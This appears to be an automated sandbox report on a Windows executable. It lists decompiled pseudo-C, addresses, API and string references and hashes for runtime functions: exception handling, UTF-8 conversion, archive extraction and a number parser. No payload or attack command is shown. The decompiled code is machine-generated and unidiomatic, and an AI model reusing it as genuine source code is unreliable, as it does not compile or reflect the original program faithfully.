malloc, xrefs: 00007FF7DA8D1353
fseek, xrefs: 00007FF7DA8D1319
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7DA8D12E2

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: d04994770d20bc8b87cee252e72671c639bd0cc3f5f71e9771cfb58c8c8dd849
Instruction ID: 8a11dc1239a9cf9794e03606c88363f32ab4b053f65afcb60a148990fb80bc73
Opcode Fuzzy Hash: d04994770d20bc8b87cee252e72671c639bd0cc3f5f71e9771cfb58c8c8dd849
Instruction Fuzzy Hash: 41417C21A0864385FE16FB11E4006AEE3A1FF54B94FC84473DE4D07A96EE7DE5628320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DDB90 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00007FF77FF7DA8DDB90(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int* _t128;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t154;
				void* _t173;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				void* _t209;
				signed long long _t219;
				signed long long _t220;
				signed long long _t226;
				long long _t228;
				signed int _t235;
				intOrPtr* _t236;
				intOrPtr* _t237;
				signed long long _t246;
				long long _t267;
				signed int* _t280;
				long long _t281;
				void* _t282;
				void* _t283;
				signed long long _t284;
				long long _t296;
				signed int _t307;
				unsigned long long _t313;

				_t180 = __esi;
				_t282 = _t283 - 0x28;
				_t284 = _t283 - 0x128;
				_t219 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t220 = _t219 ^ _t284;
				 *(_t282 + 0x10) = _t220;
				_t280 =  *((intOrPtr*)(_t282 + 0x90));
				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
				 *((long long*)(_t284 + 0x68)) = __r8;
				_t236 = __rcx;
				 *((long long*)(_t284 + 0x78)) = __rdx;
				 *(_t282 - 0x68) = _t307;
				 *((char*)(_t284 + 0x60)) = 0;
				_t281 = __r9;
				_t128 = E00007FF77FF7DA8DEAF0(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
				r14d = _t128;
				if (_t128 - 0xffffffff < 0) goto 0xda8de05f;
				if (_t128 - _t280[1] >= 0) goto 0xda8de05f;
				if ( *_t236 != 0xe06d7363) goto 0xda8ddcdc;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0xda8ddcdc;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0xda8ddcdc;
				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0xda8ddcdc;
				E00007FF77FF7DA8DCC80(_t220);
				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0xda8ddff8;
				E00007FF77FF7DA8DCC80(_t220);
				_t237 =  *((intOrPtr*)(_t220 + 0x20));
				E00007FF77FF7DA8DCC80(_t220);
				 *((char*)(_t284 + 0x60)) = 1;
				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
				E00007FF77FF7DA8DD650(_t220,  *((intOrPtr*)(_t237 + 0x38)));
				if ( *_t237 != 0xe06d7363) goto 0xda8ddc94;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0xda8ddc94;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0xda8ddc94;
				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0xda8de05f;
				E00007FF77FF7DA8DCC80(_t220);
				if ( *(_t220 + 0x38) == 0) goto 0xda8ddcdc;
				E00007FF77FF7DA8DCC80(_t220);
				E00007FF77FF7DA8DCC80(_t220);
				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
				if (E00007FF77FF7DA8DEB88(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0xda8ddcd7;
				if (E00007FF77FF7DA8DEC78(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0xda8de03c;
				goto 0xda8de018;
				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t282 - 0x48) = _t280;
				if ( *_t237 != 0xe06d7363) goto 0xda8ddfaf;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0xda8ddfaf;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0xda8ddfaf;
				r15d = 0;
				if (_t280[3] - r15d <= 0) goto 0xda8ddee0;
				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
				 *(_t284 + 0x20) = _t280;
				r8d = r14d;
				_t145 = E00007FF77FF7DA8DD33C(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0xda8ddee0;
				_t296 =  *((intOrPtr*)(_t282 - 0x28));
				r13d =  *((intOrPtr*)(_t282 - 0x30));
				 *((long long*)(_t282 - 0x80)) = _t296;
				_t146 = r13d;
				asm("inc ecx");
				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t146 - r14d > 0) goto 0xda8dded3;
				_t226 =  *(_t282 - 0x60) >> 0x20;
				if (r14d - _t146 > 0) goto 0xda8dded3;
				r12d = r15d;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
				_t313 =  *(_t282 - 0x58) >> 0x20;
				 *((long long*)(_t282 - 0x70)) = _t267;
				if (r15d == 0) goto 0xda8ddec0;
				_t246 = _t226 + _t226 * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t246 * 4; // 0x48ccccc35f40c483
				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
				E00007FF77FF7DA8DD624(_t226);
				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
				 *((long long*)(_t284 + 0x70)) = _t228;
				E00007FF77FF7DA8DD624(_t228);
				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
				if (_t176 <= 0) goto 0xda8dde50;
				E00007FF77FF7DA8DD624(_t228);
				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
				if (E00007FF77FF7DA8DE284(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0xda8dde61;
				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
				if (_t154 > 0) goto 0xda8dde14;
				r12d = r12d + 1;
				if (r12d == r15d) goto 0xda8ddec7;
				goto 0xda8dddcd;
				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
				 *(_t284 + 0x38) = _t282 - 0x60;
				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
				 *(_t284 + 0x28) = _t282 - 8;
				 *(_t284 + 0x20) = _t280;
				E00007FF77FF7DA8DDABC(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
				goto 0xda8ddecc;
				goto 0xda8dded0;
				r15d = 0;
				r13d = r13d + 1;
				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0xda8ddd65;
				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0xda8ddfec;
				_t209 = _t280[8] - r15d;
				if (_t209 == 0) goto 0xda8ddf06;
				E00007FF77FF7DA8DD610(_t282 - 8);
				if (_t209 != 0) goto 0xda8ddf27;
				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0xda8ddfec;
				if (E00007FF77FF7DA8DD1E0(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0xda8ddfec;
				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0xda8de042;
				if (_t280[8] == r15d) goto 0xda8ddf4c;
				E00007FF77FF7DA8DD610(_t282 - 8 + _t280[8]);
				_t235 = _t280[8];
				goto 0xda8ddf4f;
				if (E00007FF77FF7DA8DEB88(_t235, _t237, _t237, _t313, _t281) != 0) goto 0xda8ddfec;
				E00007FF77FF7DA8DD270(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
				_t177 =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) = _t177;
				_t178 = _t177 | 0xffffffff;
				 *((long long*)(_t284 + 0x48)) = _t281;
				 *(_t284 + 0x40) = _t313;
				 *(_t284 + 0x38) = _t178;
				 *(_t284 + 0x30) = _t178;
				 *(_t284 + 0x28) = _t280;
				 *(_t284 + 0x20) = _t313;
				E00007FF77FF7DA8DD47C( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
				goto 0xda8ddfec;
				if (_t280[3] <= 0) goto 0xda8ddfec;
				if ( *((char*)(_t282 + 0x98)) != 0) goto 0xda8de05f;
				 *(_t284 + 0x38) = _t307;
				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
				 *(_t284 + 0x28) = r14d;
				 *(_t284 + 0x20) = _t280;
				E00007FF77FF7DA8DE068(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
				_t173 = E00007FF77FF7DA8DCC80(_t235);
				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0xda8de05f;
				return E00007FF77FF7DA8DACF0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
			}

0x7ff7da8ddb90
0x7ff7da8ddb9d
0x7ff7da8ddba2
0x7ff7da8ddba9
0x7ff7da8ddbb0
0x7ff7da8ddbb3
0x7ff7da8ddbb7
0x7ff7da8ddbc1
0x7ff7da8ddbcb
0x7ff7da8ddbd0
0x7ff7da8ddbd3
0x7ff7da8ddbde
0x7ff7da8ddbe5
0x7ff7da8ddbea
0x7ff7da8ddbed
0x7ff7da8ddbf2
0x7ff7da8ddbf8
0x7ff7da8ddc01
0x7ff7da8ddc0d
0x7ff7da8ddc17
0x7ff7da8ddc28
0x7ff7da8ddc33
0x7ff7da8ddc39
0x7ff7da8ddc43
0x7ff7da8ddc49
0x7ff7da8ddc4e
0x7ff7da8ddc52
0x7ff7da8ddc5b
0x7ff7da8ddc64
0x7ff7da8ddc69
0x7ff7da8ddc74
0x7ff7da8ddc7a
0x7ff7da8ddc87
0x7ff7da8ddc8e
0x7ff7da8ddc94
0x7ff7da8ddc9e
0x7ff7da8ddca0
0x7ff7da8ddca9
0x7ff7da8ddcb4
0x7ff7da8ddcc0
0x7ff7da8ddccc
0x7ff7da8ddcd2
0x7ff7da8ddce0
0x7ff7da8ddce4
0x7ff7da8ddcee
0x7ff7da8ddcf8
0x7ff7da8ddd09
0x7ff7da8ddd0f
0x7ff7da8ddd16
0x7ff7da8ddd26
0x7ff7da8ddd31
0x7ff7da8ddd36
0x7ff7da8ddd39
0x7ff7da8ddd3e
0x7ff7da8ddd42
0x7ff7da8ddd47
0x7ff7da8ddd4c
0x7ff7da8ddd53
0x7ff7da8ddd59
0x7ff7da8ddd5d
0x7ff7da8ddd61
0x7ff7da8ddd70
0x7ff7da8ddd7f
0x7ff7da8ddd89
0x7ff7da8ddd8c
0x7ff7da8ddd90
0x7ff7da8ddd97
0x7ff7da8ddda1
0x7ff7da8ddda8
0x7ff7da8dddae
0x7ff7da8dddb4
0x7ff7da8dddbc
0x7ff7da8dddc0
0x7ff7da8dddc7
0x7ff7da8dddd0
0x7ff7da8dddd4
0x7ff7da8dddd8
0x7ff7da8ddddc
0x7ff7da8ddde0
0x7ff7da8ddde3
0x7ff7da8dddf4
0x7ff7da8dddf7
0x7ff7da8dddfc
0x7ff7da8dde09
0x7ff7da8dde0c
0x7ff7da8dde12
0x7ff7da8dde14
0x7ff7da8dde2f
0x7ff7da8dde3a
0x7ff7da8dde40
0x7ff7da8dde46
0x7ff7da8dde48
0x7ff7da8dde4e
0x7ff7da8dde50
0x7ff7da8dde56
0x7ff7da8dde5c
0x7ff7da8dde7a
0x7ff7da8dde82
0x7ff7da8dde8a
0x7ff7da8dde95
0x7ff7da8dde9d
0x7ff7da8ddea6
0x7ff7da8ddeaf
0x7ff7da8ddeb4
0x7ff7da8ddeb9
0x7ff7da8ddebe
0x7ff7da8ddec5
0x7ff7da8dded0
0x7ff7da8dded3
0x7ff7da8ddeda
0x7ff7da8ddeec
0x7ff7da8ddef2
0x7ff7da8ddef6
0x7ff7da8ddef8
0x7ff7da8ddf04
0x7ff7da8ddf0e
0x7ff7da8ddf21
0x7ff7da8ddf2f
0x7ff7da8ddf39
0x7ff7da8ddf3b
0x7ff7da8ddf43
0x7ff7da8ddf4a
0x7ff7da8ddf59
0x7ff7da8ddf6c
0x7ff7da8ddf71
0x7ff7da8ddf82
0x7ff7da8ddf86
0x7ff7da8ddf89
0x7ff7da8ddf8e
0x7ff7da8ddf93
0x7ff7da8ddf97
0x7ff7da8ddf9e
0x7ff7da8ddfa3
0x7ff7da8ddfa8
0x7ff7da8ddfad
0x7ff7da8ddfb3
0x7ff7da8ddfbc
0x7ff7da8ddfcb
0x7ff7da8ddfd3
0x7ff7da8ddfda
0x7ff7da8ddfe2
0x7ff7da8ddfe7
0x7ff7da8ddfec
0x7ff7da8ddff6
0x7ff7da8de017

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7DA8DDBED

Part of subcall function 00007FF7DA8DEAF0: __GetUnwindTryBlock.LIBCMT ref: 00007FF7DA8DEB33
Part of subcall function 00007FF7DA8DEAF0: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7DA8DEB58

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7DA8DDCC5
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7DA8DDF1A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7DA8DE026

Strings

csm, xrefs: 00007FF7DA8DDC07
csm, xrefs: 00007FF7DA8DDCE8
csm, xrefs: 00007FF7DA8DDC6E

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 37d607f2ef6e4e9c222edd22de0676be1f50fecdbf07fc71a4a40dfd36176f59
Instruction ID: a2a6c8605bd352043d1787b14409685ff4ebdb26cf38f63245b935d8c47341ba
Opcode Fuzzy Hash: 37d607f2ef6e4e9c222edd22de0676be1f50fecdbf07fc71a4a40dfd36176f59
Instruction Fuzzy Hash: 54E19B73A097418AFF21AF6594402ADB7A0FB54798F880576EE8D57B86CF3CE4A0C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7570 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D760F
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D765F

Strings

Out of memory., xrefs: 00007FF7DA8D7691
Failed to get UTF-8 buffer size., xrefs: 00007FF7DA8D76A1
win32_utils_to_utf8, xrefs: 00007FF7DA8D7698
WideCharToMultiByte, xrefs: 00007FF7DA8D76A8
Failed to encode wchar_t as UTF-8., xrefs: 00007FF7DA8D7688

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 626452242-27947307
Opcode ID: 0658ae6d084413c431a4ba418f1d2166f8922dcb0d8f2eff935ccb87966fbf39
Instruction ID: 9e2d178cc8cfe57f0d13e14533101a5a6936666a3e9477e1d0f5788ba0be89af
Opcode Fuzzy Hash: 0658ae6d084413c431a4ba418f1d2166f8922dcb0d8f2eff935ccb87966fbf39
Instruction Fuzzy Hash: DC418232A08B8285FA22AF15F44016EE764FB54790FD84176DE8D47B96EF3CD466C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7AB0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00007FF7DA8D3679), ref: 00007FF7DA8D7AF1

Part of subcall function 00007FF7DA8D2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7DA8D76B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D2654
Part of subcall function 00007FF7DA8D2620: MessageBoxW.USER32 ref: 00007FF7DA8D272C

WideCharToMultiByte.KERNEL32(?,00007FF7DA8D3679), ref: 00007FF7DA8D7B65

Strings

Out of memory., xrefs: 00007FF7DA8D7B2B
Failed to get UTF-8 buffer size., xrefs: 00007FF7DA8D7AFE
win32_utils_to_utf8, xrefs: 00007FF7DA8D7B32
WideCharToMultiByte, xrefs: 00007FF7DA8D7B05, 00007FF7DA8D7B76
Failed to encode wchar_t as UTF-8., xrefs: 00007FF7DA8D7B6F

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 3723044601-27947307
Opcode ID: f1433c8640d626ae4189be2b9051fdea489fba53c429c99114fc43a8c07ed26a
Instruction ID: ad47007ded1f2d7a46695296f99cf3b71f46c3b88742d8df01db5324743fd2d0
Opcode Fuzzy Hash: f1433c8640d626ae4189be2b9051fdea489fba53c429c99114fc43a8c07ed26a
Instruction Fuzzy Hash: 58218F31A08B4389FB12AF11E84007DF761BB94B90BC84176CE4D43796EF7CE5258310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E91B4 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00007FF77FF7DA8E91B4(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, void* __r9, void* __r10, void* __r11, long long _a8, intOrPtr _a16, long long _a24) {
				void* _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				long long _v176;
				long long _v184;
				void* __rsi;
				void* __rbp;
				void* _t163;
				signed int _t169;
				signed short _t208;
				signed short _t209;
				signed int _t210;
				signed int _t245;
				intOrPtr _t259;
				signed int _t260;
				signed int _t264;
				signed int _t265;
				signed int _t268;
				signed short* _t391;
				signed short* _t392;
				signed short* _t393;
				signed short* _t395;
				signed short** _t396;
				long long _t397;
				long long* _t400;
				signed short* _t401;
				long long* _t405;
				long long* _t406;
				long long* _t407;
				signed short** _t408;
				void* _t409;
				long long _t410;
				signed short* _t415;
				signed short* _t416;
				void* _t418;
				void* _t419;
				long long _t420;
				signed short* _t421;
				intOrPtr _t422;

				_t419 = __r11;
				_t418 = __r10;
				_t414 = __r8;
				_t405 = __rdx;
				_t397 = __rbx;
				_a24 = __rbx;
				_a8 = __rcx;
				_t420 =  *((intOrPtr*)(__rdx));
				_t265 = r9b & 0xffffffff;
				r15d = r8d;
				_v72 = _t420;
				_t408 = __rdx;
				if (_t420 != 0) goto 0xda8e91fe;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0x16;
				E00007FF77FF7DA8E9D00();
				goto 0xda8e9230;
				if (r15d == 0) goto 0xda8e9248;
				_t4 = _t414 - 2; // -2
				if (_t4 - 0x22 <= 0) goto 0xda8e9248;
				_v176 = __rcx;
				r9d = 0;
				 *((char*)(__rcx + 0x30)) = 1;
				r8d = 0;
				 *(__rcx + 0x2c) = 0x16;
				_v184 = _t410;
				E00007FF77FF7DA8E9C34(__rax, __rbx, __rcx, __rdx, _t409, _t410, __r8);
				_t400 = _t408[1];
				if (_t400 == 0) goto 0xda8e989a;
				 *_t400 =  *_t408;
				goto 0xda8e989a;
				_t10 = _t420 + 2; // 0x2
				 *_t405 = _t10;
				r14d = 0;
				if ( *((intOrPtr*)(_t400 + 0x28)) != bpl) goto 0xda8e9272;
				E00007FF77FF7DA8E3970(_t10, _t397, _t400, _t409);
				goto 0xda8e9272;
				_t389 =  *_t408;
				 *_t408 =  &(( *_t408)[1]);
				if (E00007FF77FF7DA8E792C( *_t389 & 0xffff, 8, _t397, _t400) != 0) goto 0xda8e9265;
				_t267 =  !=  ? _t265 : _t265 | 0x00000002;
				_t12 = _t397 - 0x2b; // -43
				if ((0x0000fffd & _t12) != 0) goto 0xda8e92a9;
				_t391 =  *_t408;
				_t208 =  *_t391 & 0x0000ffff;
				_t392 =  &(_t391[1]);
				 *_t408 = _t392;
				_a16 = 0xa70;
				_v168 = 0xae6;
				_v164 = 0xaf0;
				_v160 = 0xb66;
				r8d = 0x660;
				_v156 = 0xb70;
				_t20 = _t392 - 0x80; // 0x5e0
				r11d = _t20;
				_v152 = 0xc66;
				r9d = 0x6f0;
				_v148 = 0xc70;
				r10d = 0x966;
				_v144 = 0xce6;
				_v140 = 0xcf0;
				_v136 = 0xd66;
				_v132 = 0xd70;
				_v128 = 0xe50;
				_v124 = 0xe5a;
				_v120 = 0xed0;
				_v116 = 0xeda;
				_v112 = 0xf20;
				_v108 = 0xf2a;
				_v104 = 0x1040;
				_v100 = 0x104a;
				_v96 = 0x17e0;
				_v92 = 0x17ea;
				_v88 = 0x1810;
				_v84 = 0xff1a;
				_v80 = 0x19;
				if ((r15d & 0xffffffef) != 0) goto 0xda8e95e9;
				if (_t208 - 0x30 < 0) goto 0xda8e9571;
				if (_t208 - 0x3a >= 0) goto 0xda8e93c0;
				goto 0xda8e956c;
				if (_t208 - 0xff10 >= 0) goto 0xda8e955d;
				if (_t208 - r8w < 0) goto 0xda8e9571;
				if (_t208 - 0x66a >= 0) goto 0xda8e93e8;
				goto 0xda8e956c;
				if (_t208 - r9w < 0) goto 0xda8e9571;
				if (_t208 - 0x6fa >= 0) goto 0xda8e9407;
				goto 0xda8e956c;
				if (_t208 - r10w < 0) goto 0xda8e9571;
				if (_t208 - 0x970 >= 0) goto 0xda8e9426;
				goto 0xda8e956c;
				if (_t208 - r11w < 0) goto 0xda8e9571;
				if (_t208 - 0x9f0 >= 0) goto 0xda8e9445;
				goto 0xda8e956c;
				if (_t208 - (_t208 & 0x0000ffff) - r11d < 0) goto 0xda8e9571;
				if (_t208 - _a16 >= 0) goto 0xda8e9465;
				goto 0xda8e956c;
				if (_t208 - _v168 < 0) goto 0xda8e9571;
				if (_t208 - _v164 < 0) goto 0xda8e93b6;
				if (_t208 - _v160 < 0) goto 0xda8e9571;
				if (_t208 - _v156 < 0) goto 0xda8e93b6;
				if (_t208 - _v152 < 0) goto 0xda8e9571;
				if (_t208 - _v148 < 0) goto 0xda8e93b6;
				if (_t208 - _v144 < 0) goto 0xda8e9571;
				if (_t208 - _v140 < 0) goto 0xda8e93b6;
				if (_t208 - _v136 < 0) goto 0xda8e9571;
				if (_t208 - _v132 < 0) goto 0xda8e93b6;
				if (_t208 - _v128 < 0) goto 0xda8e9571;
				if (_t208 - _v124 < 0) goto 0xda8e93b6;
				if (_t208 - _v120 < 0) goto 0xda8e9571;
				if (_t208 - _v116 < 0) goto 0xda8e93b6;
				if (_t208 - _v112 < 0) goto 0xda8e9571;
				if (_t208 - _v108 < 0) goto 0xda8e93b6;
				if (_t208 - _v104 < 0) goto 0xda8e9571;
				if (_t208 - _v100 < 0) goto 0xda8e93b6;
				if (_t208 - _v96 < 0) goto 0xda8e9571;
				if (_t208 - _v92 < 0) goto 0xda8e93b6;
				if ((_t208 & 0x0000ffff) - _v88 - 9 > 0) goto 0xda8e9571;
				goto 0xda8e93b6;
				if (_t208 - _v84 >= 0) goto 0xda8e9571;
				if ((_t208 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0xda8e9597;
				_t259 = _v80;
				_t66 = _t400 - 0x41; // 0x6af
				_t67 = _t400 - 0x61; // 0x68f
				_t163 = _t67;
				if (_t66 - _t259 <= 0) goto 0xda8e958d;
				if (_t163 - _t259 > 0) goto 0xda8e9643;
				if (_t163 - _t259 > 0) goto 0xda8e9594;
				_t68 = _t400 - 0x37; // 0x5d9
				r10d = 0;
				if (_t68 != 0) goto 0xda8e9646;
				_t401 =  *_t408;
				r9d = 0xffdf;
				_t260 =  *_t401 & 0x0000ffff;
				_t69 =  &(_t401[1]); // 0xffe1
				_t415 = _t69;
				 *_t408 = _t415;
				_t70 = _t405 - 0x58; // -63
				if ((r9w & _t70) == 0) goto 0xda8e9627;
				 *_t408 = _t401;
